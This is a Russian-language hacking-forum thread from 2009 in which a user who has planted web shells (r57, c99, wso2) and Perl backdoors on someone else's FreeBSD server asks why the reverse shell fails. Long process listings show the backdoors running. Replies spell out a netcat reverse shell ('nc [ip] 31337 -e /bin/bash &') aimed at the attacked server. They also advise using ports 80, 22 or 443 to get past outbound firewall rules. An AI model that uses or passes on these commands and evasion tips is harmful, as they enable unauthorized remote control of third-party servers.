Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
18.06.2009, 19:36
|
|
Участник форума
Регистрация: 27.10.2008
Сообщений: 215
Провел на форуме:
810079
Репутация:
90
|
|
Не работает бэк-коннект
Имеется сервер, на котором стоит FreeBSD 6.2 и залит шелл. При попытке создания бэк-коннект подключения ничего не происходит. Вот привожу листинг процессов:
Код:
$ ps aux
USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND
root 10 70.1 0.0 0 8 ?? RL 4Jun09 15472:55.28 [idle]
root 928 14.6 0.3 3492 1080 con- S< 4Jun09 3139:23.89 /usr/local/sbin/s
root 592 0.8 0.2 1280 540 ?? SN 4Jun09 207:15.41 nfsd: server (nfs
root 25 0.1 0.0 0 8 ?? WL 4Jun09 83:27.62 [irq12: xl0]
www 57092 0.1 5.6 52660 17792 ?? S< Wed07PM 5:04.52 /usr/local/sbin/h
root 0 0.0 0.0 0 0 ?? WLs 4Jun09 0:00.00 [swapper]
root 1 0.0 0.0 772 80 ?? SLs 4Jun09 0:00.82 /sbin/init --
root 2 0.0 0.0 0 8 ?? DL 4Jun09 1:40.67 [g_event]
root 3 0.0 0.0 0 8 ?? DL 4Jun09 24:00.74 [g_up]
root 4 0.0 0.0 0 8 ?? DL 4Jun09 26:26.75 [g_down]
root 5 0.0 0.0 0 8 ?? DL 4Jun09 0:00.00 [kqueue taskq]
root 6 0.0 0.0 0 8 ?? DL 4Jun09 0:00.00 [thread taskq]
root 7 0.0 0.0 0 8 ?? DL 4Jun09 0:00.00 [acpi_task_0]
root 8 0.0 0.0 0 8 ?? DL 4Jun09 0:00.00 [acpi_task_1]
root 9 0.0 0.0 0 8 ?? DL 4Jun09 0:00.00 [acpi_task_2]
root 11 0.0 0.0 0 8 ?? WL 4Jun09 42:59.98 [swi1: net]
root 12 0.0 0.0 0 8 ?? WL 4Jun09 52:20.37 [swi4: clock sio]
root 13 0.0 0.0 0 8 ?? WL 4Jun09 0:00.00 [swi3: vm]
root 14 0.0 0.0 0 8 ?? DL 4Jun09 9:09.58 [yarrow]
root 15 0.0 0.0 0 8 ?? WL 4Jun09 0:01.65 [swi6: task queue
root 16 0.0 0.0 0 8 ?? WL 4Jun09 0:00.00 [swi6: Giant task
root 17 0.0 0.0 0 8 ?? WL 4Jun09 0:00.00 [swi5: +]
root 18 0.0 0.0 0 8 ?? WL 4Jun09 0:00.00 [swi2: cambio]
root 19 0.0 0.0 0 8 ?? WL 4Jun09 20:52.93 [irq11: uhci0 uhc
root 20 0.0 0.0 0 8 ?? WL 4Jun09 0:20.06 [irq14: ata0]
root 21 0.0 0.0 0 8 ?? WL 4Jun09 2:07.00 [irq15: ata1]
root 22 0.0 0.0 0 8 ?? DL 4Jun09 0:00.14 [usb0]
root 23 0.0 0.0 0 8 ?? DL 4Jun09 0:00.00 [usbtask]
root 24 0.0 0.0 0 8 ?? DL 4Jun09 0:00.09 [usb1]
root 26 0.0 0.0 0 8 ?? WL 4Jun09 0:00.00 [irq10: atapci2]
root 27 0.0 0.0 0 8 ?? DL 4Jun09 0:08.47 [fdc0]
root 28 0.0 0.0 0 8 ?? WL 4Jun09 0:00.00 [swi0: sio]
root 29 0.0 0.0 0 8 ?? WL 4Jun09 0:00.00 [irq7: ppc0]
root 30 0.0 0.0 0 8 ?? WL 4Jun09 0:00.00 [irq1: atkbd0]
root 31 0.0 0.0 0 8 ?? DL 4Jun09 3:05.08 [pagedaemon]
root 32 0.0 0.0 0 8 ?? DL 4Jun09 0:00.00 [vmdaemon]
root 33 0.0 0.0 0 8 ?? RL 4Jun09 12:52.28 [pagezero]
root 34 0.0 0.0 0 8 ?? DL 4Jun09 0:36.46 [bufdaemon]
root 35 0.0 0.0 0 8 ?? DL 4Jun09 16:48.19 [syncer]
root 36 0.0 0.0 0 8 ?? DL 4Jun09 0:41.44 [vnlru]
root 37 0.0 0.0 0 8 ?? DL 4Jun09 1:42.51 [softdepflush]
root 38 0.0 0.0 0 8 ?? DL 4Jun09 2:42.96 [schedcpu]
root 150 0.0 0.1 1252 456 ?? Is 4Jun09 0:00.00 adjkerntz -i
root 450 0.0 0.0 528 16 ?? Is 4Jun09 0:00.01 /sbin/devd
root 516 0.0 0.2 1400 792 ?? Ss 4Jun09 0:17.77 /usr/sbin/syslogd
root 535 0.0 0.2 1504 624 ?? Ss 4Jun09 0:01.65 /usr/sbin/rpcbind
root 588 0.0 0.2 1484 624 ?? Is 4Jun09 0:00.03 /usr/sbin/mountd
root 590 0.0 0.2 1348 604 ?? INs 4Jun09 0:00.06 nfsd: master (nfs
root 593 0.0 0.2 1280 540 ?? IN 4Jun09 5:26.03 nfsd: server (nfs
root 594 0.0 0.2 1280 540 ?? IN 4Jun09 0:12.07 nfsd: server (nfs
root 596 0.0 0.2 1280 540 ?? IN 4Jun09 0:01.25 nfsd: server (nfs
root 597 0.0 0.2 1280 540 ?? IN 4Jun09 0:00.05 nfsd: server (nfs
root 598 0.0 0.2 1280 540 ?? IN 4Jun09 0:00.04 nfsd: server (nfs
root 599 0.0 0.2 1280 540 ?? IN 4Jun09 0:00.00 nfsd: server (nfs
root 600 0.0 0.2 1280 540 ?? IN 4Jun09 0:00.00 nfsd: server (nfs
root 601 0.0 0.2 1280 540 ?? IN 4Jun09 0:00.00 nfsd: server (nfs
root 602 0.0 0.2 1280 540 ?? IN 4Jun09 0:00.00 nfsd: server (nfs
root 615 0.0 0.3 3436 940 ?? Is 4Jun09 0:00.00 nginx: master pro
www 618 0.0 1.0 5180 3220 ?? R 4Jun09 35:25.44 nginx: worker pro
www 619 0.0 1.1 5548 3608 ?? S 4Jun09 35:27.79 nginx: worker pro
root 645 0.0 0.3 2920 1028 ?? Ss 4Jun09 1:19.20 /usr/sbin/ntpd -c
root 668 0.0 2.0 50296 6232 ?? S<s 4Jun09 1:01.64 /usr/local/sbin/h
www 724 0.0 6.7 53076 21500 ?? S< 4Jun09 66:54.11 /usr/local/sbin/h
www 725 0.0 6.3 52436 20228 ?? S< 4Jun09 67:48.22 /usr/local/sbin/h
www 726 0.0 6.7 53304 21268 ?? S< 4Jun09 66:50.82 /usr/local/sbin/h
www 727 0.0 6.6 53152 21056 ?? S< 4Jun09 66:09.73 /usr/local/sbin/h
www 728 0.0 6.6 53052 21024 ?? S< 4Jun09 66:24.33 /usr/local/sbin/h
root 729 0.0 0.3 3524 904 ?? Is 4Jun09 0:00.01 /usr/sbin/sshd
root 734 0.0 0.6 3484 1764 ?? Ss 4Jun09 1:00.91 sendmail: accepti
smmsp 740 0.0 0.4 3384 1392 ?? Is 4Jun09 0:00.95 sendmail: Queue r
root 746 0.0 0.2 1388 772 ?? Ss 4Jun09 0:21.24 /usr/sbin/cron -s
www 776 0.0 6.2 53060 19640 ?? I< 4Jun09 61:06.90 /usr/local/sbin/h
www 790 0.0 6.5 53328 20876 ?? S< 4Jun09 65:36.43 /usr/local/sbin/h
root 915 0.0 0.0 0 8 ?? WL 4Jun09 141:22.55 [irq5: sbc0]
www 1378 0.0 6.5 53088 20756 ?? S< 4Jun09 64:18.21 /usr/local/sbin/h
www 7277 0.0 6.1 55116 19580 ?? I< 4Jun09 61:36.82 /usr/local/sbin/h
www 7366 0.0 7.7 57360 24412 ?? S< 4Jun09 65:43.98 /usr/local/sbin/h
www 18828 0.0 0.3 1708 836 ?? S< 9:27PM 0:00.00 sh -c ps aux
www 18829 0.0 0.2 1500 784 ?? R< 9:27PM 0:00.00 ps aux
www 57090 0.0 0.0 0 0 ?? Z< Wed07PM 0:00.00 <defunct>
www 57091 0.0 0.2 2984 736 ?? I< Wed07PM 0:00.04 /usr/bin/perl /tm
www 59409 0.0 0.0 0 0 ?? Z< Wed08PM 0:00.00 <defunct>
www 59410 0.0 0.2 2984 736 ?? I< Wed08PM 0:00.04 /usr/bin/perl /tm
www 59687 0.0 5.5 52456 17636 ?? S< Wed08PM 5:15.45 /usr/local/sbin/h
root 78996 0.0 0.3 1408 848 ?? I 4:30AM 0:00.00 cron: running job
root 79001 0.0 0.0 0 0 ?? Z 4:30AM 3:06.25 <defunct>
smmsp 80008 0.0 0.6 3392 2044 ?? Is 4:55AM 0:00.04 /usr/sbin/sendmai
mysql 80155 0.0 0.3 1728 820 ?? I< 4:58AM 0:00.02 /bin/sh /usr/loca
mysql 80176 0.0 11.1 59804 35460 ?? S< 4:58AM 57:50.36 /usr/local/libexe
root 966 0.0 0.2 1344 548 v0 Is+ 4Jun09 0:00.01 /usr/libexec/gett
root 967 0.0 0.2 1344 548 v1 Is+ 4Jun09 0:00.00 /usr/libexec/gett
root 968 0.0 0.2 1344 548 v2 Is+ 4Jun09 0:00.00 /usr/libexec/gett
root 969 0.0 0.2 1344 548 v3 Is+ 4Jun09 0:00.00 /usr/libexec/gett
root 970 0.0 0.2 1344 548 v4 Is+ 4Jun09 0:00.00 /usr/libexec/gett
root 971 0.0 0.2 1344 548 v5 Is+ 4Jun09 0:00.00 /usr/libexec/gett
root 972 0.0 0.2 1344 548 v6 Is+ 4Jun09 0:00.00 /usr/libexec/gett
root 973 0.0 0.2 1344 548 v7 Is+ 4Jun09 0:00.00 /usr/libexec/gett
Не подскажите, что за файрволл стоит?
Или какие ещё могут быть варианты подключения? |
|
|
18.06.2009, 20:03
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
обрезаный у тебя ps -aux, ничё не видно
какой бекконект ты юзаешь и как запускаешь?
|
|
|
|
18.06.2009, 20:04
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
на 80ый порт
|
|
|
|
18.06.2009, 20:11
|
|
Участник форума
Регистрация: 27.10.2008
Сообщений: 215
Провел на форуме:
810079
Репутация:
90
|
|
Запускал с трёх шеллов (r57, c99, wso2). В netcat прописывал nc -l -p [port]
Вроде всё правильно, так как с других серваков работает...
Код:
$ ps ax
PID TT STAT TIME COMMAND
0 ?? WLs 0:00.00 [swapper]
1 ?? ILs 0:00.83 /sbin/init --
2 ?? DL 1:40.88 [g_event]
3 ?? DL 24:02.45 [g_up]
4 ?? DL 26:28.33 [g_down]
5 ?? DL 0:00.00 [kqueue taskq]
6 ?? DL 0:00.00 [thread taskq]
7 ?? DL 0:00.00 [acpi_task_0]
8 ?? DL 0:00.00 [acpi_task_1]
9 ?? DL 0:00.00 [acpi_task_2]
10 ?? RL 15503:01.11 [idle]
11 ?? WL 43:05.34 [swi1: net]
12 ?? WL 52:26.84 [swi4: clock sio]
13 ?? WL 0:00.00 [swi3: vm]
14 ?? DL 9:10.52 [yarrow]
15 ?? WL 0:01.66 [swi6: task queue]
16 ?? WL 0:00.00 [swi6: Giant taskq]
17 ?? WL 0:00.00 [swi5: +]
18 ?? WL 0:00.00 [swi2: cambio]
19 ?? WL 20:54.40 [irq11: uhci0 uhci*]
20 ?? WL 0:20.07 [irq14: ata0]
21 ?? WL 2:07.07 [irq15: ata1]
22 ?? DL 0:00.14 [usb0]
23 ?? DL 0:00.00 [usbtask]
24 ?? DL 0:00.09 [usb1]
25 ?? WL 83:36.45 [irq12: xl0]
26 ?? WL 0:00.00 [irq10: atapci2]
27 ?? DL 0:08.49 [fdc0]
28 ?? WL 0:00.00 [swi0: sio]
29 ?? WL 0:00.00 [irq7: ppc0]
30 ?? WL 0:00.00 [irq1: atkbd0]
31 ?? DL 3:05.29 [pagedaemon]
32 ?? DL 0:00.00 [vmdaemon]
33 ?? RL 12:53.81 [pagezero]
34 ?? DL 0:36.48 [bufdaemon]
35 ?? DL 16:49.29 [syncer]
36 ?? DL 0:41.47 [vnlru]
37 ?? DL 1:42.61 [softdepflush]
38 ?? DL 2:43.30 [schedcpu]
150 ?? Is 0:00.00 adjkerntz -i
450 ?? Is 0:00.01 /sbin/devd
516 ?? Ss 0:17.82 /usr/sbin/syslogd -a 192.168.1.0/24
535 ?? Is 0:01.65 /usr/sbin/rpcbind
588 ?? Is 0:00.03 /usr/sbin/mountd -r
590 ?? INs 0:00.06 nfsd: master (nfsd)
592 ?? SN 207:34.15 nfsd: server (nfsd)
593 ?? SN 5:26.25 nfsd: server (nfsd)
594 ?? IN 0:12.07 nfsd: server (nfsd)
596 ?? IN 0:01.25 nfsd: server (nfsd)
597 ?? IN 0:00.05 nfsd: server (nfsd)
598 ?? IN 0:00.04 nfsd: server (nfsd)
599 ?? IN 0:00.00 nfsd: server (nfsd)
600 ?? IN 0:00.00 nfsd: server (nfsd)
601 ?? IN 0:00.00 nfsd: server (nfsd)
602 ?? IN 0:00.00 nfsd: server (nfsd)
615 ?? Is 0:00.00 nginx: master process /usr/local/sbin/nginx
618 ?? R 35:31.99 nginx: worker process (nginx)
619 ?? R 35:33.60 nginx: worker process (nginx)
645 ?? Ss 1:19.36 /usr/sbin/ntpd -c /etc/ntp.conf -p /var/run/ntpd.pid
668 ?? S<s 1:01.77 /usr/local/sbin/httpd
724 ?? I< 67:04.26 /usr/local/sbin/httpd
725 ?? S< 67:58.80 /usr/local/sbin/httpd
726 ?? S< 66:59.74 /usr/local/sbin/httpd
727 ?? S< 66:20.71 /usr/local/sbin/httpd
728 ?? I< 66:39.11 /usr/local/sbin/httpd
729 ?? Is 0:00.01 /usr/sbin/sshd
734 ?? Ss 1:01.06 sendmail: accepting connections (sendmail)
740 ?? Is 0:00.95 sendmail: Queue runner@00:30:00 for /var/spool/client
746 ?? Is 0:21.29 /usr/sbin/cron -s
776 ?? I< 61:06.90 /usr/local/sbin/httpd
790 ?? I< 65:45.34 /usr/local/sbin/httpd
915 ?? LL 141:39.81 [irq5: sbc0]
1378 ?? S< 64:27.45 /usr/local/sbin/httpd
7277 ?? I< 61:36.82 /usr/local/sbin/httpd
7366 ?? S< 65:55.41 /usr/local/sbin/httpd
20604 ?? S< 0:00.00 sh -c ps ax
20605 ?? R< 0:00.00 ps ax
57090 ?? Z< 0:00.00 <defunct>
57091 ?? I< 0:00.04 /usr/bin/perl /tmp/bp.pl 31337 (perl5.8.8)
57092 ?? S< 5:21.52 /usr/local/sbin/httpd
59409 ?? Z< 0:00.00 <defunct>
59410 ?? I< 0:00.04 /usr/bin/perl /tmp/bdpl 11457 (perl5.8.8)
59687 ?? S< 5:26.34 /usr/local/sbin/httpd
78996 ?? I 0:00.00 cron: running job (cron)
79001 ?? Z 3:06.25 <defunct>
80008 ?? Is 0:00.04 /usr/sbin/sendmail -FCronDaemon -odi -oem -oi -t
80155 ?? I< 0:00.02 /bin/sh /usr/local/bin/mysqld_safe --defaults-extra-f
80176 ?? S< 61:13.92 /usr/local/libexec/mysqld --defaults-extra-file=/var/
966 v0 Is+ 0:00.01 /usr/libexec/getty Pc ttyv0
967 v1 Is+ 0:00.00 /usr/libexec/getty Pc ttyv1
968 v2 Is+ 0:00.00 /usr/libexec/getty Pc ttyv2
969 v3 Is+ 0:00.00 /usr/libexec/getty Pc ttyv3
970 v4 Is+ 0:00.00 /usr/libexec/getty Pc ttyv4
971 v5 Is+ 0:00.00 /usr/libexec/getty Pc ttyv5
972 v6 Is+ 0:00.00 /usr/libexec/getty Pc ttyv6
973 v7 Is+ 0:00.00 /usr/libexec/getty Pc ttyv7
928 con- S< 3145:49.36 /usr/local/sbin/sc_trans_freebsd /usr/local/etc/shout
|
|
|
|
18.06.2009, 20:21
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
для тебя и для всех остальных напишу в сотый раз
то что ты делаешь - это не бекконект. nc -l -p ты открываешь порт на сервере, как правило (90%) фаервол блокирует конекты на левые порта
Бекконет - это когда ты открываешь порт на своём компе (дедике) а на атакуемом сервере конектишься
для нетката у себя открываешь
nc -l -v -p 31337
на атакуемом сервере
nc [ip дедика] 31337 -e /bin/bash &
|
|
|
|
18.06.2009, 20:23
|
|
Постоянный
Регистрация: 24.03.2009
Сообщений: 670
Провел на форуме:
2868783
Репутация:
414
|
|
Сделай бк на 80, 22 etc. порты, а то исходящие на высокие порты iptables видимо блочит
|
|
|
|
18.06.2009, 20:31
|
|
Участник форума
Регистрация: 27.10.2008
Сообщений: 215
Провел на форуме:
810079
Репутация:
90
|
|
Я знаю что такое бэкконнект  Я итак на своём компе порт слушаю (сайт в локалке). А с сервака ни на какие порты ко мне не хочет коннектиться.
А из приведённых выше процессов не видно какой файрволл стоит?
Последний раз редактировалось InFlame; 18.06.2009 в 20:36..
|
|
|
|
18.06.2009, 21:07
|
|
Постоянный
Регистрация: 24.03.2009
Сообщений: 670
Провел на форуме:
2868783
Репутация:
414
|
|
*linux -> iptables
*bsd -> ipfw
|
|
|
|
19.06.2009, 11:59
|
|
Участник форума
Регистрация: 27.10.2008
Сообщений: 215
Провел на форуме:
810079
Репутация:
90
|
|
Почему тогда в процессах не видно ipfw?
|
|
|
|
19.06.2009, 12:32
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813
Репутация:
1396
|
|
Если ты откроешь бекконект так, как написал паучок)) ,то все получится..главное что б у тебя был внешний ип. По своему опыту могу посоветывать порт 443, сомневаюсь что он у тебя занят)
вот только в данном случае советую запускать nc без "-e /bin/bash &"
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
